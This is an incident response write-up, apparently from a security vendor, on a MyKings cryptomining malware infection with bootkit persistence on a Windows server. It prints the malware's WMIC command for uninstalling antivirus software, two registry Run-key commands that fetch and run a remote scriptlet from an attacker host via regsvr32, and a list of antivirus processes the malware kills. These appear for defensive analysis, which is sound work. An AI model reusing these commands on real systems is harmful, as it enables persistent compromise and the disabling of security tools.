Investigating MyKings Malware Variant With Bootkit Persistence

MyKings Malware Variant With Bootkit Persistence

INCIDENT DESCRIPTION

This malware event was detected and blocked on the 16th of January, 2020, when a malicious application (winnts.exe) used a trusted application (powershell.exe) to download and run a malicious script from a malicious IP address. The malicious script was obtained and further analysis and Incident Response was carried out on the infected Server.
Upon more research and analysis of the batch file, we noticed that the script abused PowerShell and downloaded other malware files from the Command and Control Center IP address.

Powershell Script

Our findings, as detailed in the next section, confirmed that the file is malicious, and subsequently, our analysts were able to contain the attack and remediate it on 4th March, 2020. This malware file attempted to uninstall other antivirus products on the system and created scheduled tasks that runs automatically to use hijack the system resources in order to mine cryptocurrency. The Type of Malware is called “My Kings Malware” which adds the system to a botnet used to mine cryptocurrency for the attacker.

SYSTEM AFFECTED BY INCIDENT
Type of Incident DetectedMalicious Code
Potential Damages by IncidentReduced System PerformanceNetwork Resources Consumption
Attack Source167.88.180.175
Operating System of Affected SystemWindows Server 2012 R2 Standard
Additional System Details:The server has our malware defense suite installed on it, this allowed our analysts to carry out in-depth analysis on the malware, prevent and block the malware from running again.

INVESTIGATION INDICATORS

In other to better analyze the file, we downloaded the script code and ran it in a sandbox with real-time interaction and process monitoring. From the analysis of the behavior activities, both malicious and suspicious, we were able to ascertain the tactics and techniques of the file. The file carried out actions similar to the following tactics and techniques:

  • Execution
  • Persistence
  • Privilege Escalation
  • Defense Evasion
  • Credential Access
  • Command and Control
MITRE Technique Detection

The file used legitimate windows processes such as RegistryPowerShellScheduled Tasks and WMIC to schedule tasks, create and run processes, and dump other malware files in Windows Installation Directory.

Investigation on Sophos Dashboard
Hybrid Analysis Result

Further investigation and analysis on other malware platforms showed the file to be malicious in nature and gave a threat score of 100/100 to the file.

Use of WMIC

The malware attempted to use the Windows Management Instrumentation to uninstall antivirus solutions. It queries popular antivirus solutions and attempts to uninstall them. Below is the command used in attempting to uninstall Norton antivirus program.

“C:\Windows\System32\Wbem\WMIC.exe” product where “name like ‘%Norton Security%’” call uninstall /nointeractive

REMEDIATION OF INCIDENT

Registry Edits

We checked to ensure that registry modifications carried out by the malware investigated,  we also identified registry key edit and effectively remove them:

“HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN” /V “START” /D “REGSVR32 /U /S /I:HTTP://JS.FTP1202.SITE:280/V.SCT SCROBJ.DLL” /F

“HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN” /V “START” /D “REGSVR32 /U /S /I:HTTP://JS.FTP1202.SITE:280/V.SCT SCROBJ.DLL” /F

The content of one of the registry keys is seen in the figure below.

Registry Change

Trojan Agent and Downloader

We identified some Trojan downloaders and agents at the following locations respectively,

%WINDIR%\inf\aspnet\lsma.exe

%WINDIR%\inf\aspnet\lsma30.exe

%WINDIR%\inf\aspnet\lsma31.exe

%WINDIR%\inf\winnts.exe

%WINDIR%\debug\lsmo.exe

%WINDIR%\help\lsmosee.exe

Scheduled Tasks

Some tasks were scheduled to automatically run the malware. These tasks were found in the windows task scheduler and they include:

  • my1
  • Mysa
  • Mysa1
  • Mysa2
  • Mysa3
  • ok
  • oka
Scheduled Task In Registry

These identified malware tasks were created by the malicious PowerShell script and were subsequently deleted from the server during our remediation attempt.

Rootkit Persistence

The malware installed a rootkit on the server which ensures that the malware gets loaded before the operating system boots up. This ensures that some listed anti-virus solution do not work and ensures that the malware returns after reboot. This was removed from the server. The list of the anti-virus solutions to be terminated are listed in the below.

avp.exeacaegmgr.exesapissvc.exe
superkiller.exeavastsvc.exeavgsvc.exe
360sd.exebdagent.exeaycagentsrv.ayc
360safe.exemcshield.exeliveupdate360.exe
360rps.exemcsvhost.exe360rp
kavfs.exemfefire.exeqqpctray.exe
sragent.exemfemms.exeMcshield.exe
mbamservice.exearwsrvc.exeshstat.exe
avguard.exedwarkdaemon.exenaprdmgr.exe
avgnt.exevssery.exeavgui.exe
msmpeng.exeahnsdsv.exeekrn.exe
nissrv.exeasdsvc.exedwengine.exe
msseces.exekavfswp.exespideragent.exe
avengine.exembamservice.exebdagent.exe
savservice.exembam.exehipsmain.exe
nod32krn.exeqhpisvr.exeavastui.exe

RECOMMENDATION

As identified during the investigation, the system was breached as a result of the Eternal Blue vulnerability existing on the computer. The system was updated and the malicious program was removed and the actions taken by it were reversed.

The following recommendations are to be put in place to prevent future re-occurrence of this incident.

  1. Applications should be downloaded from verified publishers only.
  2. The use of cracked/patched software should be avoided.
  3. Regular Windows update on all systems.
  4. Installation of EDR on all endpoints on the network to stop potential attacks and prevent it from infecting other systems on the network.
  5. Upgrading of the Server with the Windows Server image file so as to fix the problem with windows automatic updates.
  6. Disable unnecessary services such as RDP on internet facing computers.

Appendix
IOCs

IP Addresses:
103.106.250.161
167.88.180.175
167.88.180.188
173.247.239.186
199.168.100.74

Hashes

790c213e1227adefd2d564217de86ac9fe660946e1240b5415c55770a951abfd
fea935d2d0fb1abadb900f009b4c40bb8a91fd9e25cc76ed4f9dae08960566d5

Leave a Reply

Your email address will not be published. Required fields are marked *

Scroll to Top